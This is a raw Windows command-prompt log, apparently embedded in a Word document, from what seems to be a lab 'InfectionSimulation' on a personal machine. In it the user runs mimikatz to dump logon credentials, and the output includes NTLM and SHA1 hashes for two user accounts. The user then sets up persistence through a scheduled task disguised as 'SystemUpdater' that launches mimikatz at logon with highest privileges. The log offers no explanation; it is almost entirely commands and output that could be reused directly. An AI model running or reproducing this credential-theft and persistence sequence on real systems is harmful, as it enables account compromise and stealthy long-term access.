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Windows [Version 10.0.19045.5854]                                                                             (c) Microsoft Corporation. All rights reserved.                                                                                                                                                                                                 C:\Windows\system32&gt;cd C:\InfectionSimulation                                                                                                                                                                                                   C:\InfectionSimulation&gt;mimikatz.exe                                                                                                                                                                                                               .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08                                                             .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                              ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                                 ## \ / ##       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https://blog.gentilkiwi.com/mimikatz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'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )                                                 '#####'        &gt;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https://pingcastle.com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https://mysmartlogon.com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***/                                                                                                                                                                       mimikatz # privilege::debug                                                                                             Privilege '20' OK                                                                                                                                                                                                                               mimikatz # sekurlsa::logonpasswords                                                                                                                                                                                                             Authentication Id : 0 ; 1586963 (00000000:00183713)                                                                     Session           : Interactive from 1                                                                                  User Name         : Sumit                                                                                               Domain            : DESKTOP-H7F79CG                                                                                     Logon Server      : DESKTOP-H7F79CG                                                                                     Logon Time        : 6/2/2025 1:27:46 AM                                                                                 SID               : S-1-5-21-1112181999-4199777422-2251726333-1001                                                              msv :                                                                                                                    [00000003] Primary                                                                                                      * Username : Sumit                                                                                                      * Domain   : DESKTOP-H7F79CG                                                                                            * NTLM     : 9218809b443d9dd59bcc9efd18572af9                                                                           * SHA1     : 32e5028f8b147f4d8c374bcd02d82bbe5b9e13c3                                                                   * DPAPI    : 32e5028f8b147f4d8c374bcd02d82bbe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Sumit                                                                                                      * Domain   : DESKTOP-H7F79CG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 * Username : Sumit                                                                                                      * Domain   : DESKTOP-H7F79CG                                                                                            * Password : (null)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1050757 (00000000:00100885)                                                                     Session           : Interactive from 1                                                                                  User Name         : Sumit                                                                                               Domain            : DESKTOP-H7F79CG                                                                                     Logon Server      : DESKTOP-H7F79CG                                                                                     Logon Time        : 6/2/2025 1:21:32 AM                                                                                 SID               : S-1-5-21-1112181999-4199777422-2251726333-1001                                                              msv :                                                                                                                    [00000003] Primary                                                                                                      * Username : Sumit                                                                                                      * Domain   : DESKTOP-H7F79CG                                                                                            * NTLM     : 9218809b443d9dd59bcc9efd18572af9                                                                           * SHA1     : 32e5028f8b147f4d8c374bcd02d82bbe5b9e13c3                                                                   * DPAPI    : 32e5028f8b147f4d8c374bcd02d82bbe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Sumit                                                                                                      * Domain   : DESKTOP-H7F79CG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 * Username : Sumit                                                                                                      * Domain   : DESKTOP-H7F79CG                                                                                            * Password : (null)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356268 (00000000:00056fac)                                                                      Session           : Interactive from 1                                                                                  User Name         : testuser                                                                                            Domain            : DESKTOP-H7F79CG                                                                                     Logon Server      : DESKTOP-H7F79CG                                                                                     Logon Time        : 6/2/2025 1:20:00 AM                                                                                 SID               : S-1-5-21-1112181999-4199777422-2251726333-1002                                                              msv :                                                                                                                    [00000003] Primary                                                                                                      * Username : testuser                                                                                                   * Domain   : DESKTOP-H7F79CG                                                                                            * NTLM     : 58a478135a93ac3bf058a5ea0e8fdb71                                                                           * SHA1     : 0d7d930ac3b1322c8a1142f9b22169d4eef9e855                                                                   * DPAPI    : 0d7d930ac3b1322c8a1142f9b22169d4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testuser                                                                                                   * Domain   : DESKTOP-H7F79CG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 * Username : testuser                                                                                                   * Domain   : DESKTOP-H7F79CG                                                                                            * Password : (null)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51225 (00000000:0000c819)                                                                       Session           : Interactive from 1                                                                                  User Name         : DWM-1                                                                                               Domain            : Window Manager                                                                                      Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:55 AM                                                                                 SID               : S-1-5-90-0-1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51207 (00000000:0000c807)                                                                       Session           : Interactive from 1                                                                                  User Name         : DWM-1                                                                                               Domain            : Window Manager                                                                                      Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:55 AM                                                                                 SID               : S-1-5-90-0-1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997 (00000000:000003e5)                                                                         Session           : Service from 0                                                                                      User Name         : LOCAL SERVICE                                                                                       Domain            : NT AUTHORITY                                                                                        Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:55 AM                                                                                 SID               : S-1-5-19    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(null)                                                                                                     * Domain   : (null)   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 * Username : (null)                                                                                                     * Domain   : (null)                                                                                                     * Password : (null)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996 (00000000:000003e4)                                                                         Session           : Service from 0                                                                                      User Name         : DESKTOP-H7F79CG$                                                                                    Domain            : WORKGROUP                                                                                           Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:55 AM                                                                                 SID               : S-1-5-20    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27987 (00000000:00006d53)                                                                       Session           : Interactive from 0                                                                                  User Name         : UMFD-0                                                                                              Domain            : Font Driver Host                                                                                    Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:54 AM                                                                                 SID               : S-1-5-96-0-0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27918 (00000000:00006d0e)                                                                       Session           : Interactive from 1                                                                                  User Name         : UMFD-1                                                                                              Domain            : Font Driver Host                                                                                    Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:54 AM                                                                                 SID               : S-1-5-96-0-1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26993 (00000000:00006971)                                                                       Session           : UndefinedLogonType from 0                                                                           User Name         : (null)                                                                                              Domain            : (null)                                                                                              Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:54 AM                                                                                 SID               :             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kerberos :          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Authentication Id : 0 ; 999 (00000000:000003e7)                                                                         Session           : UndefinedLogonType from 0                                                                           User Name         : DESKTOP-H7F79CG$                                                                                    Domain            : WORKGROUP                                                                                           Logon Server      : (null)                                                                                              Logon Time        : 6/2/2025 1:18:54 AM                                                                                 SID               : S-1-5-18                                                                                                    msv :                                                                                                                   tspkg :                                                                                                                 wdigest : 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kerberos :                                                                                                               * Username : desktop-h7f79cg$                                                                                           * Domain   : WORKGROUP                                                                                                  * Password : (null)                                                                                                    ssp :                                                                                                                   credman :                                                                                                               cloudap :                                                                                                                                                                                                                               mimikatz # exit                                                                                                         Bye!                                                                                                                                                                                                                                            C:\InfectionSimulation&gt;schtasks /create /tn "SystemUpdater" /tr "C:\InfectionSimulation\mimikatz.exe" /sc onlogon rl highest                                                                                                                    ERROR: Invalid argument/option - 'rl'.                                                                                  Type "SCHTASKS /CREATE /?" for usage.                                                                                                                                                                                                           C:\InfectionSimulation&gt;schtasks /create /tn "SystemUpdater" /tr "C:\InfectionSimulation\mimikatz.exe" /sc onlogon /rl highest                                                                                                                   SUCCESS: The scheduled task "SystemUpdater" has successfully been created.                                                                                                                                                                      C:\InfectionSimulation&gt;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ingcastle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blog.gentilkiwi.com/mimikatz" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://mysmartlogon.com/" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="styles.xml" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /></Relationships>
</file>